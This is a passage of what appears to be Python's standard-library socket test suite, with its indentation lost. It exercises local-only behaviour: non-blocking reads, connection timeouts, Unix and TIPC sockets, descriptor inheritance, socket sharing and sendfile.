# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid cloding the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# plaform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# The is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
